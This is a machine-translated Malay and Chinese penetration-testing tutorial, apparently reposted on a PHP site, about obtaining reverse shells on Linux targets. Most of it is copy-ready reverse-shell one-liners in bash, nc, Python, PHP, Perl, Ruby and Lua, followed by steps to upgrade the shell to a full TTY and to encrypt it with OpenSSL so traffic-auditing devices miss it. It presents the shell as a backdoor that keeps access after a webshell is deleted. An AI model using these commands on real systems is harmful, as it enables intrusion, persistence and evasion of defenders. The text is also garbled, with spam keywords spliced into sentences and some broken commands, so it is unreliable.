Rumah > Tutorial sistem > LINUX > teks badan

Pemahaman mendalam tentang cangkerang: Analisis kata nama am dan senario aplikasi dalam penembusan

王林
Lepaskan: 2024-06-13 21:26:03
asal
1193 orang telah melayarinya

深入了解 shell:渗透中常用名词解析及应用场景

Apa itu cengkerang

Shell ialah istilah yang biasa digunakan dalam penembusan, seperti getshell, webshell, crash shell, dll., semuanya berkaitan dengan shell.

Shell dijelaskan oleh Baidu Encyclopedia:

Dalam sains komputer, Shell juga dipanggil shell (untuk membezakannya daripada teras), yang merujuk kepada "menyediakan antara muka operasi untuk pengguna

Perisian

face” (penghurai arahan Ia serupa dengan yang di bawah DOS dan kemudiannya

).

cmd.exe. Ia menerima arahan pengguna dan kemudian memanggil aplikasi yang sepadan.

Ringkasnya, pengguna mengakses perkhidmatan kernel sistem pengendalian melalui shell, iaitu, dari shell ke kernel untuk melaksanakan arahan sistem.

getshell: Dapatkan kebenaran pelaksanaan arahan daripada sasaran

webshell: merujuk kepada pintu sisi laman web linux kernel sprintf, yang melaksanakan arahan melalui perkhidmatan web

Dip shell: pindahkan input dan output baris arahan ke hos lain

Mengapa kita harus menjatuhkan cengkerang

1. Tiada interaksi semasa melaksanakan arahan di bawah cangkerang web Untuk memudahkan operasi penembakan atau lain-lain, anda mesti membuka cangkerang.

2. Cangkang rebound adalah bersamaan dengan menambah pintu sisi Apabila cangkerang web ditemui dan dipadamkan, kebenaran tidak akan hilang.

Kaedah yang biasa digunakan untuk ranap shell di Linux

Gunakan arahan whereis untuk menentukan teknik panggil balik yang disokong oleh sasaran.

 whereis nc bash python php exec lua perl ruby
Salin selepas log masuk

linux 内核 sprintf_内核sprintf_内核管理器

linux 内核 sprintf_内核sprintf_内核管理器

bash ranap shell

Panggil balik Bash ialah kaedah yang paling biasa digunakan dalam pertempuran sebenar

nc -lvp 9999
bash -i >& /dev/tcp/ip/port 0>&1
Salin selepas log masuk

Lepaskan arahan dan analisanya:

1. bash-i bermaksud membuka bash secara tempatan

2. /dev/tcp/ ialah peranti khas dalam Linux Membuka fail ini sama dengan mengeluarkan panggilan soket dan membina sambungan soket

3 Fail /dev/tcp/ip/port di sebelah >& bermaksud mengubah hala output standard dan output ralat standard ke fail ini, iaitu menghantarnya ke vps jauh

.

4 Jika vps jauh membuka port yang sepadan untuk mencuri dengar, ia akan menerima output standard dan output ralat standard bagi bash ini.

nc menjunam cengkerang

Memerlukan nc untuk dipasang pada hos sasaran

nc ip port -e /bin/sh
Salin selepas log masuk

使用其他版本的nc

nc.traditional ip port -e /bin/sh
Salin selepas log masuk

linux 内核 sprintf_内核管理器_内核sprintf

内核sprintf_linux 内核 sprintf_内核管理器

配合命名管线进行大跌:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc ip port >/tmp/f
Salin selepas log masuk

python大跌shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Salin selepas log masuk

首先使用socket与远程构建起联接,接出来使用到了os库的dup2方式将标准输入、标准输出、标准错误输出重定向到远程,dup2这个方式有两个参数,分别为文件描述符fd1和fd2,当fd2参数存在时,就关掉fd2,之后将fd1代表的那种文件强行复制给fd2linux之家,在这儿可以把fd1和fd2看作是C语言里的表针,将fd1形参给fd2,就相当于将fd2指向于s.fileno(),fileno()返回的是一个文件描述符,在这儿也就是构建socket联接返回的文件描述符,复印下来数值为3

0代表标准输入、1代表标准输出、2代表标准错误输出、3代表重定向到远程

接出来使用os的subprocess在本地开启一个子进程,传入参数“-i”使bash以交互模式启动,标准输入、标准输出、标准错误输出又被重定向到了远程,这样的话就可以在远程执行输入命令了。

php大跌shell

linux 内核 sprintf_内核sprintf_内核管理器

须要php关掉safe_mode选项,才可以使用exec函数。

使用php的exec函数执行方式1大跌shell的命令

php- 'exec("/bin/bash -i >& /dev/tcp/ip/port")'
Salin selepas log masuk

使用php的fsockopen去大跌shell

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i &3 2>&3");'
Salin selepas log masuk

其它大跌方式

exec大跌

0<&196;exec 196/dev/tcp/ip/port; sh &196 2>&196
Salin selepas log masuk

perl大跌

perl -e &#039;use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};&#039;
Salin selepas log masuk

ruby大跌

ruby -rsocket -e&#039;f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)&#039;
Salin selepas log masuk

lua大跌

lua -e "require(&#039;socket&#039;);require(&#039;os&#039;);t=socket.tcp();t:connect(&#039;ip&#039;,&#039;port&#039;);os.execute(&#039;/bin/sh -i &3 2>&3&#039;);"
Salin selepas log masuk

内核管理器_linux 内核 sprintf_内核sprintf

获取一个完全交互shell

通过上述命令大跌shell得到的shell并不能称为完全交互的shell,一般称之为'哑'shell。

一般存在以下缺点

因而有必要去获取一个完全交互的shell。

1、在shell中执行python,使用pty模块,创建一个原生的终端,命令如下:

python -c &#039;import pty; pty.spawn("/bin/bash")&#039;
Salin selepas log masuk

隐藏

运行完后

2、键入Ctrl-Z暂停任务,切回到VPS的命令行中;在VPS中执行:

stty raw -echo 
fg #将后台运行或挂起的任务切换到前台运行
Salin selepas log masuk

内核管理器_内核sprintf_linux 内核 sprintf

3、在shell中执行,得到一个完全交互的shell,支持命令补全、历史命令查看、语法高亮、vim编辑等功能。

reset
export SHELL=bash
export TERM=xterm-256color
stty rows 54 columns 104
Salin selepas log masuk

内核管理器_内核sprintf_linux 内核 sprintf

内核sprintf_linux 内核 sprintf_内核管理器

SSL流量加密

部份防护设备会对内外网传输流量进行审查,大跌shell执行命令都是以明文进行传输的linux 内核 sprintflinux 命令,很容易被查杀。

因而须要将原始流量使用openssl加密,绕开流量审计设备。

1、首先vps上生成SSL证书的私钥/公钥对,信息懒得填,仍然回车即可。

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Salin selepas log masuk

linux 内核 sprintf_内核sprintf_内核管理器

2、vps使用OpenSSL窃听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 8888
Salin selepas log masuk

内核sprintf_linux 内核 sprintf_内核管理器

3、目标主机执行回调加密shell

mkfifo /tmp/s; /bin/bash -i &1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s
Salin selepas log masuk

内核sprintf_linux 内核 sprintf_内核管理器

大跌成功,成功接收到ssl流量加密的shell。

内核管理器_内核sprintf_linux 内核 sprintf

Pautan rujukan

Atas ialah kandungan terperinci Pemahaman mendalam tentang cangkerang: Analisis kata nama am dan senario aplikasi dalam penembusan. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

sumber:itcool.net
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan
Tentang kita Penafian Sitemap
Laman web PHP Cina:Latihan PHP dalam talian kebajikan awam,Bantu pelajar PHP berkembang dengan cepat!